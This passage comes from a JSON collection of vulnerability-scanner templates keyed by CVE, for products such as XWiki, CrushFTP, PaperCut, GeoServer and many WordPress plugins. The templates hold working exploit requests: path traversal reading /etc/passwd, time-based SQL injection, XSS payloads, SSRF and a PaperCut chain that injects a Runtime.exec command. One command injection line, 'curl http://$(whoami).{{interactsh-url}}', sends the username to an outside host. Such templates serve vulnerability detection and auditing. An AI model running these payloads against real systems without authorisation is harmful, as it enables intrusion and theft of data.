onerror=alert(document.domain)>ridxm","mooSocial"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2023-37462","info":{"name":"XWiki Platform - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/bin/view/%22%5d%5d%20%7b%7b%61%73%79%6e%63%20%61%73%79%6e%63%3d%22%74%72%75%65%22%20%63%61%63%68%65%64%3d%22%66%61%6c%73%65%22%20%63%6f%6e%74%65%78%74%3d%22%64%6f%63%2e%72%65%66%65%72%65%6e%63%65%22%7d%7d%7b%7b%70%79%74%68%6f%6e%7d%7d%70%72%69%6e%74%28%33%37%32%34%33%34%38%20%2a%20%38%34%37%33%33%33%34%29%7b%7b%2f%70%79%74%68%6f%6e%7d%7d%7b%7b%2f%61%73%79%6e%63%7d%7d?sheet=SkinsCode.XWikiSkinsSheet&xpage=view","{{BaseURL}}/asyncrenderer/{{url}}?clientId={{id}}&timeout=500&wiki=xwiki"],"skip-variables-check":true,"extractors":[{"type":"regex","group":1,"name":"id","regex":["data-xwiki-async-client-id=\"(.+?)\""],"internal":true},{"type":"regex","group":1,"name":"url","regex":["<span class=\"xwiki-async\" data-xwiki-async-id=\"(.+?)\""],"internal":true}],"matchers":[{"type":"dsl","dsl":["body_2 == \"31557644536232\"","contains(header_2, \"text/html\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2023-43177","info":{"name":"CrushFTP < 10.5.1 - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/WebInterface"],"matchers":[{"type":"dsl","internal":true,"dsl":["contains_all(to_lower(header), \"currentauth\", \"crushauth\")"]}]},{"method":"POST","path":["{{BaseURL}}/WebInterface/function/?command=getUsername&c2f={{http_1_currentauth}}"],"headers":{"Cookie":"CrushAuth={{http_1_crushauth}}; currentAuth={{http_1_currentauth}}","as2-to":"X","user_name":"crushadmin{{dirname}}","user_log_path":"./WebInterface/{{dirname}}/","user_log_file":"{{filename}}","Content-Type":"application/x-www-form-urlencoded"},"body":"post=body\n","matchers":[{"type":"regex","regex":["crushadmin"]}]},{"method":"GET","path":["{{BaseURL}}/WebInterface/{{dirname}}/{{filename}}"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"crushadmin{{dirname}}\")"],"condition":"and"}]}]},{"id":"CVE-2023-46359","info":{"name":"cPH2 Charging Station v1.87.0 - OS Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/connectioncheck.php?ip={{url_encode('127.0.0.1 && curl http://$(whoami).{{interactsh-url}}')}}"],"matchers-condition":"and","matchers":[{"type":"word","words":["<b>SUCCESS</b>","127.0.0.1 && curl http://$(whoami).{{interactsh-url}}"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2023-23488","info":{"name":"WordPress Paid Memberships Pro <2.9.8 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 30s\nGET /?rest_route=/pmpro/v1/order&code=a%27%20OR%20(SELECT%201%20FROM%20(SELECT(SLEEP(7)))a)--%20- HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/paid-memberships-pro/js/updates.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=7","status_code_1 != 403","contains(body_2, \"pmpro_updates\")"],"condition":"and"}]}]},{"id":"CVE-2023-24322","info":{"name":"mojoPortal 2.7.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Dialog/FileDialog.aspx?ed=foooooooooooooo%27);});});javascript:alert('document.domain');//g"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["javascript:alert('document.domain')","File Browser"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-24735","info":{"name":"PMB 7.4.6 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pmb/opac_css/pmb.php?url=https://oast.me&hash={{md5('https://oast.me')}}"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2023-6020","info":{"name":"Ray Static File - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/static/js/../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header","words":["application/octet-stream","aiohttp"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-36346","info":{"name":"POS Codekop v2.0 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/print.php?nm_member=<script>alert(document.location)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.location)</script>","<title>print</title>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-38194","info":{"name":"SuperWebMailer - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}","{{BaseURL}}/keepalive.php?caller=%22%3E%3Cimg+src%3d1+onerror%3dalert(document.domain)+%2F%3E&uq_mt=1664137650.085"],"matchers":[{"type":"dsl","dsl":["contains(body_2, \"<img src=1 onerror=alert(document.domain) />\")","contains(tolower(body_1), \"superwebmailer\")","contains(header_2, \"text/html\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2023-2009","info":{"name":"Pretty Url <= 1.5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog=((username))&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=prettyurls HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin.php?page=prettyurls HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dprettyurls&id=&category=accordions%7Epost_type&url=%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&meta_title=&meta_description=&meta_keyword=\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_3, \"<img src=x onerror=alert(document.domain)>\")","contains(body_3, \"prettyurls\")"],"condition":"and"}],"extractors":[{"type":"regex","internal":true,"name":"nonce","part":"body","group":1,"regex":["name=\"_wpnonce\" value=\"([0-9a-z]+)\" />"]}]}]},{"id":"CVE-2023-40779","info":{"name":"IceWarp Mail Server Deep Castle 2 v.13.0.1.2 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%5coast.pro/%2f%2e%2e"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.pro.*$"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2023-41597","info":{"name":"EyouCms v1.6.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"word","part":"body","words":["eyoucms","ey_fleshVerify"],"condition":"or","internal":true,"case-insensitive":true}]},{"method":"GET","path":["{{BaseURL}}/admin/twitter.php?active_t=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>"]},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27350","info":{"name":"PaperCut - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /app?service=page/SetupCompleted HTTP/1.1\nHost: {{Hostname}}\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FSetupCompleted%2F%24Form&sp=S0&Form0=%24Hidden%2CanalyticsEnabled%2C%24Submit&%24Hidden=true&%24Submit=Login\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FConfigEditor%2FquickFindForm&sp=S0&Form0=%24TextField%2CdoQuickFind%2Cclear&%24TextField=print-and-device.script.enabled&doQuickFind=Go\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FConfigEditor%2F%24Form&sp=S1&Form1=%24TextField%240%2C%24Submit%2C%24Submit%240&%24TextField%240=Y&%24Submit=Update\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FConfigEditor%2FquickFindForm&sp=S0&Form0=%24TextField%2CdoQuickFind%2Cclear&%24TextField=print.script.sandboxed&doQuickFind=Go\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FConfigEditor%2F%24Form&sp=S1&Form1=%24TextField%240%2C%24Submit%2C%24Submit%240&%24TextField%240=N&%24Submit=Update\n","GET /app?service=page/PrinterList HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=page%2FPrinterList\n","POST /app?service=direct/1/PrinterList/selectPrinter&sp={{printerID}} HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FPrinterList%2FselectPrinter&sp={{printerID}}\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FPrinterDetails%2FprinterOptionsTab.tab&sp=4\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FPrinterDetails%2F%24PrinterDetailsScript.%24Form&sp=S0&Form0=printerId%2CenablePrintScript%2CscriptBody%2C%24Submit%2C%24Submit%240%2C%24Submit%241&printerId={{printerID}}&enablePrintScript=on&scriptBody=function+printJobHook%28inputs%2C+actions%29+%7B%7D%0D%0Ajava.lang.Runtime.getRuntime%28%29.exec%28%27{{cmd}}%27%29%3B&%24Submit%241=Apply\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Avanceret kontering"]}],"extractors":[{"type":"regex","name":"printerID","group":1,"regex":["erList\\/selectPrinterCost&amp;sp=([a-z0-9]+)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-6505","info":{"name":"Prime Mover < 1.9.3 - Sensitive Data Exposure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/uploads/prime-mover-export-files/1/"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Index of /wp-content/uploads/prime-mover-export-files/1",".wprime"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-25157","info":{"name":"GeoServer OGC Filter - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /geoserver/ows?service=WFS&version=1.0.0&request=GetCapabilities HTTP/1.1\nHost: {{Hostname}}\n","GET /geoserver/ows?service=WFS&version=1.0.0&request=GetFeature&typeName={{name}}&maxFeatures=50&outputFormat=csv HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 30s\nGET /geoserver/ows?service=WFS&version=1.0.0&request=GetFeature&typeName={{name}}&CQL_FILTER=strStartswith({{column}},%27%27%27%27)=true HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"iterate-all":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["SQL SELECT"]},{"type":"word","part":"header_3","words":["text/xml"]}],"extractors":[{"type":"regex","name":"name","group":1,"regex":["<FeatureType><Name>(.*?)<\\/Name><Title>"],"internal":true,"part":"body_1"},{"type":"regex","name":"column","group":1,"regex":["FID,([aA-zZ_]+),"],"internal":true,"part":"body_2"}]}]},{"id":"CVE-2023-26256","info":{"name":"STAGIL Navigation for Jira Menu & Themes <2.0.52 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/servlet/snjFooterNavigationConfig?fileName=../../../../etc/passwd&fileMime=$textMime"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["$textMime"]},{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-43187","info":{"name":"NodeBB XML-RPC Request xmlrpc.php - XML Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"dsl","internal":true,"dsl":["contains(to_lower(body), \"nodebb\")"]}]},{"method":"POST","path":["{{BaseURL}}/xmlrpc.php"],"headers":{"Content-Type":"text/xml"},"body":"<?xml version=\"1.0\"?>\n<methodCall>\n  <methodName>system.listMethods</methodName>\n  <params>\n    <param>\n      <value><?php phpinfo(); ?></value>\n    </param>\n  </params>\n</methodCall>\n","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>phpinfo()</title>","PHP Version"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-6023","info":{"name":"VertaAI ModelDB - Path Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/artifact/getArtifact?artifact_path=../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header","words":["application/octet-stream","filename="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-34752","info":{"name":"bloofoxCMS v0.5.2.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /admin/index.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&action=login\n","@timeout: 10s\nPOST /admin/index.php?mode=settings&page=lang&action=edit HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname=English&flag=en.gif&filename=english.php&date=m%2Fd%2FY&datetime=m%2Fd%2FY+-+H%3Ai&token=en&lid='+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&send=Save\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=6","contains(header_2, \"text/html\")","contains(body_2, 'bloofoxCMS Admincenter')"],"condition":"and"}]}]},{"id":"CVE-2023-6038","info":{"name":"H2O ImportFiles - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /3/ImportFiles?path=%2Fetc%2Fpasswd HTTP/1.1\nHost: {{Hostname}}\n","POST /3/ParseSetup HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsource_frames=%5B%22nfs%3A%2F%2Fetc%2Fpasswd%22%5D\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, 'ImportFilesV3')","regex('root:.*:0:0:', body_2)","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2011-2744","info":{"name":"Chyrp 2.x - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-4336","info":{"name":"Tiki Wiki CMS Groupware 7.0 Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/snarf_ajax.php?url=1&ajax=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-4640","info":{"name":"WebTitan < 3.60 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET /login-x.php HTTP/1.1\nHost: {{Hostname}}\n","POST /login-x.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nX-Requested-With: XMLHttpRequest\n\njaction=login&language=en_US&username={{username}}&password={{password}}\n","GET /logs-x.php?jaction=view&fname=../../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2, \"success\\\":true\")","contains(body_1, \"WebTitan\")","regex('root:.*:0:0:', body)","status_code_3 == 200"],"condition":"and"}]}]},{"id":"CVE-2011-4926","info":{"name":"Adminimize 1.7.22 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/adminimize/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Adminimize ==="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-5181","info":{"name":"ClickDesk Live Support Live Chat 2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/clickdesk-live-support-chat/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["ClickDesk Live Support - Live Chat"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-5107","info":{"name":"Alert Before Your Post <= 0.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/alert-before-your-post/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-5179","info":{"name":"Skysa App Bar 1.04 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/skysa-official/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Skysa App"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/skysa-official/skysa.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-4804","info":{"name":"Joomla! Component com_kp - 'Controller' Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_kp&controller=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-5265","info":{"name":"Featurific For WordPress 1.6.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/featurific-for-wordpress/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Featurific For Wordpress"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-1669","info":{"name":"WP Custom Pages 0.5.0.1 - Local File Inclusion (LFI)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-5252","info":{"name":"Orchard 'ReturnUrl' Parameter URI - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/orchard/Users/Account/LogOff?ReturnUrl=%2f%2fhttp://interact.sh%3f"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2011-3315","info":{"name":"Cisco CUCM, UCCX, and Unified IP-IVR- Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-4624","info":{"name":"GRAND FlAGallery 1.57 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/flash-album-gallery/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Grand Flagallery"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-4618","info":{"name":"Advanced Text Widget < 2.0.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/advanced-text-widget/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/advanced-text-widget/advancedtext.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"</script><script>alert(document.domain)</script>\")","contains(body_1, \"Advanced Text Widget\")"],"condition":"and"}]}]},{"id":"CVE-2011-5106","info":{"name":"WordPress Plugin Flexible Custom Post Type < 0.1.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-2780","info":{"name":"Chyrp 2.x - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/includes/lib/gz.php?file=/themes/../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-0049","info":{"name":"Majordomo2 - SMTP/HTTP Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35985","info":{"name":"Rukovoditel <= 2.7.2 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=global_lists/lists&action=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=test\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2020-19360","info":{"name":"FHEM 6.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24579","info":{"name":"D-Link DSL 2888a - Authentication Bypass/Remote Command Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nCookie: uid=6gPjT2ipmNz\n\nusername=admin&password=6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b\n","GET /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd HTTP/1.1\nHost: {{Hostname}}\nCookie: uid=6gPjT2ipmNz\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["nobody:[x*]:65534:65534","root:.*:0:0:"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24148","info":{"name":"Import XML & RSS Feeds WordPress Plugin <= 2.0.1 Server-Side Request Forgery","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/import-xml-feed/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Import XML feed"]}]},{"raw":["POST /wp-admin/admin-ajax.php?action=moove_read_xml HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntype=url&data=http%3A%2F%2F{{interactsh-url}}%2F&xmlaction=preview&node=0\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-26258","info":{"name":"XStream <1.4.15 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<map>\n  <entry>\n    <jdk.nashorn.internal.objects.NativeString>\n      <flags>0</flags>\n      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>\n        <dataHandler>\n          <dataSource class='javax.activation.URLDataSource'>\n            <url>http://{{interactsh-url}}/internal/:</url>\n          </dataSource>\n          <transferFlavors/>\n        </dataHandler>\n        <dataLen>0</dataLen>\n      </value>\n    </jdk.nashorn.internal.objects.NativeString>\n    <string>test</string>\n  </entry>\n</map>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: Java"]}]}]},{"id":"CVE-2020-11798","info":{"name":"Mitel MiCollab AWV 8.1.2.4 and 9.1.3 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/awcuser/cgi-bin/vcs_access_file.cgi?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header","words":["application/x-download","filename=passwd"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35774","info":{"name":"twitter-server Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/histograms?h=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&fmt=plot_cdf&log_scale=true"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-27838","info":{"name":"KeyCloak - Information Exposure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/auth/realms/master/clients-registrations/default/security-admin-console"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["\"clientId\":\\s*\"security-admin-console\"","\"secret\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17463","info":{"name":"Fuel CMS 1.4.7 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /fuel/login/ HTTP/1.1\nHost: {{Hostname}}\n","POST 